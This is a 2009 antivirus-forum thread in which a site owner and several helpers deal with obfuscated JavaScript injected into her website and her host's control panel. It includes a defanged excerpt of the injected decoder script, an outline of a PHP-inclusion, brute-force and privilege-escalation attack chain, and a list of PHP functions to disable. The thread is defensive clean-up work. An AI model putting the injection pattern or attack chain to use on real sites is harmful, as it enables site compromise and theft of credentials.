Avast WEBforum
Other => Viruses and worms => Topic started by: MonsterKat on May 10, 2009, 07:32:15 PM
-
Hey Everyone!
I went on my website today that I am the owner and web designer of, hxxp://www.valskidsline.com and AVAST came on and said that it had the HTML:IFrame-EJ [trj] located on xxx.valskidsline.com then seconds later it comes up again saying its located in my firefox cache. If I do this on IE, it says its in the Temporary folder, obviously.
Now, I went on my FTP Control Panel, and it the pop-up shows up there aswell. I also went on Gensap.com my website hosting service, and of course the pop-up is there aswell. These are the only sites that it is showing up on, I can go on everything else.
I've tried to log into my Control panel, to check that out and find the virus, but once the Avast popup comes on, it prevents me from logging in.
I've sent an email to my tec support, and if being Sunday, doesn't help. They are also quite slow are replying.
I have Avast Virus running right now, as well as Spybot and Adware.
Don't click on the link, unless you know what you are doing.
Any help I can get would be fantastic.
Edit: Avast Home Scan, Through Disk Scan was completed and no viruses were found. Or so it said anyways.
Happy Mothers Day to your moms!
-
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
-
There is a large chunk of obfuscated script on the same single line, directly after the opening Body tag (two inserted script tags), so it looks like your site has been hacked.
-
Thank's alot for your help guys. This is so disappointing, I'm good at making sites, but not so good at knowing how to fix or what do to in this situation as this has never happened before. What should I do next? The thing that would make sense to me is log into my cpanel, delete the files or clean them, then re-upload everything right? Change my password info and all of that if it hasn't been already changed by the hacker. I try and go onto the cpanel but when the Avast comes up, I can't log into it, obviously. What else should I do?
Thanks very much everyone
-
I'm good at making sites, but not so good at knowing how to fix or what do to in this situation as this has never happened before.
Can you overwrite the files uploading the new ones (maybe by ftp transfer) and without having to log the site hosts?
-
Thank's alot for your help guys. This is so disappointing, I'm good at making sites, but not so good at knowing how to fix or what do to in this situation as this has never happened before. What should I do next? The thing that would make sense to me is log into my cpanel, delete the files or clean them, then re-upload everything right? Change my password info and all of that if it hasn't been already changed by the hacker. I try and go onto the cpanel but when the Avast comes up, I can't log into it, obviously. What else should I do?
Thanks very much everyone
You're welcome.
Commonly this happens because of vulnerabilities in the site content management software (PHP,SQL, WordPress, etc.) being exploited, usually because of old versions of the software. So you will need to talk to your Host for advice in that regard if it is them that provide this and ask about how they/you can secure your site to prevent future occurrences.
If avast gets in on the act when you open control panel, I take it this is server hosted ?
If so then you would need Host help in resolving that. However, if you aren't actually running the file and the alert is the web shield then you could pause it. You would have to be extra careful and only be on-line as short a time as possible and enable the web shield again.
If as suggested you just upload and overwrite existing files by ftp, it is entirely possible they end up infected too as has happened in at least one topic that I remember.
This is by no means easy but the first thing is to change passwords for any area to do with uploading/modifying or controlling content, etc.
-
Can you overwrite the files uploading the new ones (maybe by ftp transfer) and without having to log the site hosts?
If as suggested you just upload and overwrite existing files by ftp, it is entirely possible they end up infected too as has happened in at least one topic that I remember.
Sorry. Out of my knowledge limits :-[
-
David R hit the nail right on the end! Your very good at this haha, but I'm sure you already know that. ;)
I emailed the host first thing when I found out that this had happened, telling them everything and this was the response. I was stunned to get a reply, I've had issues before and waited weeks for a response. Prompt isn't there forte.
I actually got a response!
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and
changed some default settings to help prevent these coding
compromises. The weaknesses were not server wide but rather just made
it easier on a hacker to compromise individual end user accounts.
I suggest the following clean up procedure for both your accounts:
1. check all index pages for any signs of java script injected into
their coding. On windows servers check any "default.aspx" or
"default.cfm" pages as those are popular targets too.
2. Remove any "rouge" files or php scripts uploaded by the hackers
into your account. Such scripts allowed them to make account wide
changes, spam through your account, or spread their own .htaccess
files through all of your domains in that end user.
3. Check all .htaccess files, as hackers like to load re-directs into them.
4. Change all passwords for that end user account. The cp password,
the ftp password, and any ftp sub accounts. Make sure to use a
"strong" password which includes upper case, lower case, numbers and
NO COMPLETE WORDS OR NAMES!
This coupled with our server side changes should prevent any
resurfacing of the hackers efforts. In some cases you may still have
coding which allows for injection. All user input fields hidden or not
should be hard coded, filtered, and sanitized before being handed off
to php or a database which will prevent coding characters from being
submitted and run through your software.
Thanks,
So I grabbed my guts and tried to log into the host server, so I could see the files. I was quite nervous that the trogan would start to download as soon as I signed in, the pop-up warnings from Avast and AdAware were a site to see. I went on real quickly, searched for any of the files that he had reccomended, and did not see any. There was no files added, BUT my files were altered and the javascript was injected. I went in and editted the index.php & index.html and found the HUGE long injections. The one on index.php was loaded with links and all this crazy stuff, I deleted it and reloaded it. The index.html was all crazy with foreign letter and number combos of a java script. I deleted that and re uploaded it. I then went and looked on the site, and I nolonger recieved any notifications on Avast or Adaware and it looks perfectly normal. I am still looking through all of my pages and making sure nothing has been added. I will then change my passwords, and clear out my computer, run avast again, just to be safe.
I've always been kinda paranoid/ better safe then sorry with everything, so I was shocked to say the least that this has happened. But it was a releif to know that this wasn't at my end, and more so the hosts end.
Thank you everyone for your help, your really awesome! I appreciate David showing me exactly where the problem was when he uploaded the picture. That was a big help for me.
Now that the pop-ups are all clear, is it safe to say the website has been taken care of?
Also, I just noticed this as I was typing this message. I went on my log in-page for the host, and the exact same pop-up is there! hxxp://cpanel2.page14.com and on hxxp://www.gensap.com - my hosts site.
I emailed the host and told them this, but is this a problem caused by my computer or is it at there end? I'm not to sure.
Thanks everyone!
-
You're welcome.
Thanks for posting the response from the Host, it could help others (I have saved it as there is no identifying detail) in how they go about cleaning house. I too am presently surprised by your Hosts prompt and very helpful response, if only they were all like that instead of ignoring or blaming the user for giving out their passwords.
I don't believe the log-in page alerting has anything to do with your computer as a) this is a server side page, b) and c) you can't modify it because it isn't in your control. I could be wrong (don't think so though ;D), it has been a very long time since I did any web design and securing my site and importantly I didn't use any content management software.
So it may be that all the control panel log-in pages are contaminated by remnants of infected pages on the server side, this is exactly as the infected pages on your site, huge chunk of obfuscated javascript (again two script tags all on one line), see image.
Can you modify the links in your last post, change http to hXXp to avoid accidental exposure to malware.
-
Hi MonsterKat,
Can't you please break the links you gave, like hxtp://suspicious-link.com or www dot suspicious-link dot com, so the curious aren't able to click these links. Why we hold this policy all over these webforums, you can read here where I have explained the reasons for this security principle: http://forum.avast.com/index.php?topic=45139.0
polonus
-
Links are edited and I apologize. I made a mental note to edit them, and then I just simply forgot. Stupid me, I wouldn't want to cause any issues for anyone else, especially after receiving wonderful help.
I emailed the host and told them I have cleaned up the mess at my end, and pointed out the log in page and the main site being infected and I won't be logging into the server until they get it cleaned up, just in case. I managed to get on long enough to clean my site up, and that was it. It's not allowing me to log in anymore, so maybe they have started.
-
No problem (one down, millions more to go, sorry in joke), we avast users feel a little immune to these types of attack, but it is just good practice not to have links active to suspect sites.
You are fortunate to have a Host that is somewhat more proactive than most, hopefully they are cleaning house also. Lets us know how you get on.
-
MonsterKat,
The site now seems OK: http://www.blacklistdoctor.com/bld/diagnose.php?URL=www.valskidsline.com&scan_id=5830
Unmaks parasites says: This page seems to be <clean>
Exploit Prevention Labs: LinkScanner says:
Congratulations! LinkScanner Online did not find any exploits.
Scanned:
Monday, May 11, 2009
pol
-
Thanks alot Pol, that's a great help. I didn't know about that site, and I'm glad that I managed to find all the injected files. I can't thank everyone here for the help enough!
My host still has not replied to my email regarding the log in pages and there site being infected. The prompt reply they gave me, was really a one hit wonder afterall :P :P
So as of now, our site is clean but I can't log in and do anything further because they still haven't fixed it at there end. But our site is now good, and that's my major worry.
Thank-you everyone!
-
You're welcome.
After such a promising start by your Host :P
-
Thanks for the thread here guys. Others (like me) have also experienced this exploit.
For your interest, a discussion is currently underway at my host (who is always very helpful) here:
http://support.jodohost.com/showthread.php?t=16472
If you use webalizer, check that too, as I found the exploit script also appeared in /webalizer/default.html.
It also seems to add a hacked .htaccess file to your root folder and your /webalizer folder.
HTH
-
I'm having a very similar problem but avast is detecting HTML:IFrame-EE [trj] on 2 websites I need to work on made with cpanel. Some offending code has been found in the index pages and removed and the problem goes away but within a matter of hours this code has written itself back in. Can anyone tell me how to permanently remove this code?
-
^ That's interesting.. we can work out where the vulnerability is.
Firstly, do you have Frontpage extensions enabled on those sites? If so, turn it off and see how that goes.
-
I'm having a very similar problem but avast is detecting HTML:IFrame-EE [trj] on 2 websites I need to work on made with cpanel. Some offending code has been found in the index pages and removed and the problem goes away but within a matter of hours this code has written itself back in. Can anyone tell me how to permanently remove this code?
What comes after the iframe- is just a slightly different variant on the same hack, so that isn't really the issue, but to resolve why you were hacked, so I suggest you check out the quoted text in Reply #7 on page 1 of this topic. This is from his host on measures they ahve taken and measures he should take.
If you haven't already contacted your Host to report this (asking advice about how they/you can prevent a recurrence) as it is likely it could be effecting other sites hosted by them.
-
Hi
i've just spotted this problem on one of my web forums (based on PhpBB). I've found a java script added after the closing php tag " ?>" in several php files like index.php login.php etc . There were the same dates of modifying these files. The result was the php error on the front page which said " Cannot modify header information - headers already sent .. "
Of course i got rid of these scripts, but have one question - did somebody copied the content of this java script ?
Could you copy and paste this here ? (because i have archived the content of "my" scripts to compare them)
-
First ensure the forum PHP software is up to date as this looks like an exploit of the PHP software, old versions are vulnerable to attack/exploit.
I'm not sure what you mean by "did somebody copied the content of this java script" ?
The inserted code 'Script tags'
You should NOT post the code here as that could have avast alert on the forums, you could post an image of the code. I really don't believe that will help much as it would probably follow the same pattern of the other images I posted in the first page of this topic.
-
Hi markooff,
Maybe you have an interesting read here, as there is PHP involved in the code injection from within:
http://blog.fortinet.com/code-injection-from-within/
JQuery ( http://jquery.com/ ) is a respectable and popular JavaScript library by John Resig (who's also a Mozilla employee).
The problem is that most site embeds it in its minified version (for bandwidth reasons), which makes differential fingerprinting from malicious obfuscated code OMG :shock: quite difficult.
Furthermore jquery-1.3.2.min.js can contains recognition pattern of JS/Dldr.Agent.Agr.1 java script virus.
Index.js see: htxp://www.wolframalpha.com//common/jav ... 3.2.min.js is not something to show to the world and malcoders..
If the software code you have there is not fully updated and patched, or there is some old usable crap-code still somewhere laying around on that site, the hacker just needs a little maneuverability to perform these inline injection attacks outside HTML. You can check your whole site here: http://www.blacklistdoctor.com/bld/diagnose.php
Possible attack scenario, not your example necessarily...
1) The attacker finds a hole in your users local PHP script
2) The inject their own PHP code from a remote file making it run as if they are uploading the page through regular FTP.
3) There are various ways you can easily collect the usernames of accounts, extremely easily performed.
4) You can start to then bruteforce attacks on passwords of user accounts
5) You can then start scouring the server for local exploits and use them to your advantage. e.g.: the script you mentioned in that include checks to see if wget, gcc and other system binaries are on the system and accessible for the attacker to use.
6) With a list of whats installed and what they can use, they can now download hacks and start trying to crack your machine and compiling code attempting to gain root, etc.
7) They can search any and all 777 permission files/directories and inject whatever they feel like. Good times for them, crappy time for the site owners and server owners to clean up the mess after the site software was compromised.
Preventing this is a combination of things that I won't go into complete details about but I'll brief over so you get the idea.
1) Lock your system binaries, like wget, gcc, and others to stop anyone from using them.
2) Secure PHP by disabling functions used such as: proc_open, exec, system, passthru, etc..
3) Make sure PHP/Apache is up to date
4) Install mod_security and have CURRENT ruleset! Mod_security through cPanel install has NO rule-set! Use a rule-set that is handed out to all clients which was tried, tested and true.
5) Have a current kernel installed, there are many exploits that still work on a lot of providers.
There are tons of measures you can do to help lock your machine, so the hacker has less room to maneuver and turn you into a victim,
polonus
-
Hey everyone, me again.....unfortunatly.
I'm quite upset with the happenings on mywebsite. I got it all cleaned up at my end and now its back. The Host has been no help at all and did not return my email when this happened before nor have they cleaned up the control panel page. This is crazyness. So because I was unable to change my password they did it all again.
-
Hi MonsterKat,
Yep, the malcode is back there: EDITED Heavily ^/head^^script type="text/j*v*script"v*r hdOruVsHnKBXZuvtsRmw = ^..........."z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z5 etc.....67z109z101z62";v*r kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");v*r TEptzkmsBZolwWqWunem = "";f*r (v*r KYLMhcILlLcFQRyPBlHD=1; ....KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.l*ngth; KYLMhcILlLcFQRyPBlHD++){TEptzkmsBZolwWqWunem+=Str*ng.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);}document.write(TEptzkmsBZolwWqWunem)^/script^
Why the hoster or the webmaster there cannot clean up his act, is beyond me, if you get your security issues presented on a platter by users is just the security world upside down, "Sign of "HTML:IFrame-EJ [Trj]" has been found in ----304_frame.php\{gzip} file". Also present them with this issues with the PHP version they are using: http://secunia.com/advisories/product/3194/?task=advisories
polonus
-
I have yet to get any kind of reply from my host and I am in the process of shopping around for another host right now. BUT for the time being I cannot afford to lose any buisness that the website is bringing in.
Now, my question is this.
Is it a bad idea to very quickly turn off avast and sign into the userpanel, delete the virus off of my website and then change my password. Then Log out of the control panel and turn avast back on, followed with a virus scan?
My host clearly doesn't give a rats behind about this and there control panels and severs being infected. I just want my customers to be able to use my website and not get infected.
I can understand that this would be very risky for me to do, but I don't think I have any other option.
I don't use FTP, so thats not a root I can go..
Thanks alot
-
Hi MonsterKat,
This could be done as you propose, but I would still perform it from a Mozilla browser like firefox with NoScript extension and RequestPolicy installed and active. NoScript will protect you from evil scripts running, if you have to have javascript active, then prohibit requests to other domains then yours through using the RequestPolicy add-on.
RequestPolicy add-on can be found here: https://addons.mozilla.org/en-US/firefox/addon/9727/
NoScript here: https://addons.mozilla.org/nl/firefox/addon/722
Check your code from here: http://www.selfseo.com/html_source_view.php
Or do it through webbug from Amman software: http://www.cyberspyder.com/webbug.html
That program is made to do this and you can leave avast on, and perform your tasks as planned without further ado...
polonus
-
This is great, I already use Firefox so getting those add-ons will be a quick job. I'll be doing this right now, thanks very much!
Now I know this is unrelated to a virus, but I have a quick question. Does anyone know if godaddy.com is reputable? How would I go about making sure they have the newest and safest versions of things so I know this doesn't happen again. Go Daddy is apparently one of the most popular for webhosting and I realize I'm just being paranoid. But I just want to make sure..... lol
That graphic of yours is pretty impressive lol. Reminds me of my cats haha.
-
Hi MonsterKat,
GoDaddy's reputation was not always stellar, but they recently acquired a better reputation.
Did you get the webbug tool as well? See attached what you get back there.
polonus
-
MonsterKat, try looking at JodoHost, that's where I host my clients' sites.
Great support, very reliable and "mature" service.
I think what we've experienced here is the "Grumblar" exploit.
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
It seems to behave in a similar way and is currently doing the rounds quite effectively. It does indeed steal FTP and other site credentials on infected PCs. The exploit is based on a vulnerability in Adobe apps incl. Flash. Recommendations are to install latest adobe stuff which have now patched the holes.
I'm pretty convinced this is how it happened for me. Can't think of another way my client's simple, HTML-only, non-DW, non-FP site could have been modified so extensively other than by FTP, via this exploit. Far more probable than a compromised hosting provider.
So check your PCs for Grumblar, update to latest Adobe versions and see how it goes.
[ed] code'd the link, sorry.
-
Oh avuser2007,
Cannot you make the link you put up there non-click-able by changing to hXtp for instance etc, the unmasked parasites sites has the script there unedited (which actually is stupid) so avast flags it. If we put malcode script here for instance we edit the code heavily ( <> gets ^^ and with breaks ...... or j*vascript for instance) so it cannot run or we publish only part of it - only so webmasters can trace it themselves, also a secure way is to publish it as a screendump image,
polonus
-
Alright so here is my update, It makes no sense to me but you guys are smarter so hopefully this helps....
I went on and did everything I was suppost to and used the Request Policy and No Script, I edited the index page and saved it. Then I got off and reset firefox to few the website and the warning on avast came on again.
Now I have come across a new thing,
My mom ( who is Val obviously with val's kids line) has been in talks with a customer via email. Everytime she clicks on the email from the customer, the exact same alert comes up from avast. The email from her has an attachment attached to it BUT it has never been downloaded. The attachment is called stat3199.jpg I don't think the attachment being shown has anything to do with it because it's never been downloaded. This is a trusted customer so I know that she didn't do this. I am very confused as to why when I read an email from her that warning comes up.
The email address she uses is NOT a website server email address it is a yahoo.ca address that she has always used.
Any ideas?
Thanks guys!
-
Everytime she clicks on the email from the customer, the exact same alert comes up from avast. The email from her has an attachment attached to it BUT it has never been downloaded.
Avast is probably scanning the attachment via the link to it in the email. A friend of mine was recently infected with Grumblar via a fake Facebook "you've been frieneded" email.
Simple answer - delete the attachment. And NO sender is "trusted". Unless you 100% trust the sender isn't infected with trojans on their own PC. Just because you trust the person doesn't mean you can trust their PC. :)
-
Not sure what index page you are talking about. If you are editing the control panel index page then that would revert to that served up by the Host. If the Hosts end is infected then it is highly likely that it will continue to infect sites that it hosts.
Now I have come across a new thing,
Everytime she clicks on the email from the customer, the exact same alert comes up from avast. The email from her has an attachment attached to it BUT it has never been downloaded.
I somehow doubt it is 'exactly' the same message as the Internet Mail providers messages differ from those of the web shield, so we really need to know the full error message. Check the avast! Log Viewer (right click the avast 'a' icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe
- Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log.
I also suggest that you create a new topic for this or it will just confuse this topic.
-
5/10/2009 11:42:01 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 11:52:19 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 11:52:57 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 11:54:42 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 11:54:51 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 11:55:07 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 11:55:13 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 11:57:29 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 11:57:47 AM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 12:05:59 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 12:06:08 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 12:21:57 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\EADEA65Ad01" file.
5/10/2009 12:22:05 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://gensap.com/Contact/Default.aspx" file.
5/10/2009 12:22:19 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.gensap.com/" file.
5/10/2009 12:22:43 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\BB323658d01" file.
5/10/2009 12:27:01 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 12:27:10 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Temporary Internet Files\Content.IE5\PL3V19GI\valskidsline_com[1].htm" file.
5/10/2009 12:30:22 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 12:30:39 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 12:35:17 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 12:35:17 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 3:55:46 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/10/2009 4:01:31 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/10/2009 4:01:35 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file.
5/10/2009 4:29:30 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/index.php" file.
5/10/2009 5:08:04 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "http://cpanel2.page14.com/" file.
5/10/2009 5:08:58 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/10/2009 5:12:48 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/10/2009 5:16:34 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.gensap.com/" file.
5/10/2009 5:16:39 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\EADEA65Ad01" file.
5/10/2009 5:25:04 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/10/2009 5:25:22 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/10/2009 5:25:27 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "http://cpanel2.page14.com/" file.
5/10/2009 5:25:51 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/10/2009 5:26:02 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/10/2009 5:27:48 PM SYSTEM 1360 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 4:41:54 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/28/2009 4:43:18 PM SYSTEM 1604 Sign of "HTML:Framer-inf [Trj]" has been found in "hxxp://rnw.kz/index.php\{gzip}" file.
5/28/2009 4:43:19 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
5/28/2009 4:54:15 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:02:09 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:02:17 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:02:18 PM SYSTEM 1604 Sign of "HTML:Framer-inf [Trj]" has been found in "hxxp://rnw.kz/index.php\{gzip}" file.
5/28/2009 5:03:11 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:03:22 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:03:30 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:03:45 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:03:55 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:04:24 PM SYSTEM 1604 Sign of "HTML:Framer-inf [Trj]" has been found in "hxxp://rnw.kz/index.php\{gzip}" file.
5/28/2009 5:07:03 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
5/28/2009 5:07:10 PM SYSTEM 1604 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file.
6/1/2009 4:58:51 PM SYSTEM 1652 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
6/2/2009 10:45:34 PM SYSTEM 1400 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
6/2/2009 10:54:00 PM SYSTEM 1400 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
6/2/2009 11:25:42 PM Administrator 2416 Sign of "JS:Pdfka-GH [Expl]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Temporary Internet Files\Content.IE5\PL3V19GI\index[3].htm" file.
6/2/2009 11:29:41 PM Administrator 2416 Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Temporary Internet Files\Content.IE5\PL3V19GI\valskidsline_com[1].htm" file.
6/3/2009 11:36:28 AM SYSTEM 1400 Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file.
6/3/2009 11:46:42 AM SYSTEM 1400 Sign of "JS:Redirector-H9 [Trj]" has been found in "hxxp://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/\{gzip}" file.
So there's that, I couldn't upload an attachment as I don't have that option so I hope this will help.
I went on to my hosts control panel, signed in and was editting the index page from there and just saving it. It was a risk just to do that much because my HOST is infected. So evertime I upload, it's just going to get re-infected?
I'm switching hosts for sure as mine clearly isn't going to fix this. If I go to another host am I still going to have issues? I think now I have the infection in my computer, but I'm not all that smart with this..... ( as you can tell)
thanks everyone!
-
I ran out of room on my last post.
So as you can see, there is been alot of issues.
My hosts home page is infected, my control panel through the host is infected and so is my website and potentionally my computer.
I'm so lost there's no finding me lol.
-
For your own computer, I suggest:
1. Clean your temporary files.
2. Schedule a boot time scanning with avast with archive scanning turned on. If avast does not detect it, you can try DrWeb CureIT! (http://www.freedrweb.com/cureit/) instead.
3. Use MBAM (http://malwarebytes.org/mbam.php) (or SUPERantispyware (http://www.superantispyware.com) or even Spyware Terminator (http://www.spywareterminator.com/)) to scan for spywares and trojans. If any infection is detected, better and safer is send the file to Quarantine than to simple delete them.
4. Test your machine with anti-rootkit applications (http://www.antirootkit.com/software/index.htm). I suggest avast! antirootkit (http://files.avast.com/files/beta/aswar.exe) or Trend Micro RootkitBuster (http://www.trendmicro.com/download/rbuster.asp).
5. Make a HijackThis (http://www.bleepingcomputer.com/files/hijackthis.php) log to post here or this analysis site (http://www.hijackthis.de/#anl). Or even submit the RunScanner (http://www.runscanner.net/) log to to on-line analysis.
6. Disable System Restore and then reenable it again.
7. Immunize your system with SpywareBlaster (http://www.javacoolsoftware.com/spywareblaster.html).
8. Check if you have insecure applications with Secunia Software Inspector (http://secunia.com/software_inspector/).
For your website, I suggest cleaning the code, use strong passwords to change the code.
-
My hosts home page is infected
You're kidding, what's the URL? I'll remember not to use that host. :) Seriously, give us the URL so we can see if the host really is infected or if it's just something on your system.
-
Can you not see the first URL in the quoted text, that is his site, it is also at the start of the topic...
-
Can you not see the first URL in the quoted text, that is his site, it is also at the start of the topic...
Can you not see I'm after the web host's infected URL, not the valskidsline site?
-
The hosts information is also in the topic's first page a whois would also shoe the server it is hosted on.
-
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:03:44 PM, on 6/3/2009
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16827)
Boot mode: Normal
Running processes:
C:\WINDOWS.0\System32\smss.exe
C:\WINDOWS.0\system32\winlogon.exe
C:\WINDOWS.0\system32\services.exe
C:\WINDOWS.0\system32\lsass.exe
C:\WINDOWS.0\system32\svchost.exe
C:\WINDOWS.0\System32\svchost.exe
C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
C:\Program Files\Lavasoft\Ad-Aware\AAWService.exe
C:\Program Files\Alwil Software\Avast4\ashServ.exe
C:\WINDOWS.0\Explorer.EXE
C:\WINDOWS.0\system32\spoolsv.exe
C:\WINDOWS.0\system32\igfxtray.exe
C:\WINDOWS.0\system32\hkcmd.exe
C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
